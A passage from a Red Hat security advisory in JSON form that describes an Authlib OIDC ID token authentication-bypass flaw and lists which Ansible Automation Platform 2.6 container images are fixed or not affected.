"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448182"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library\u0027s internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
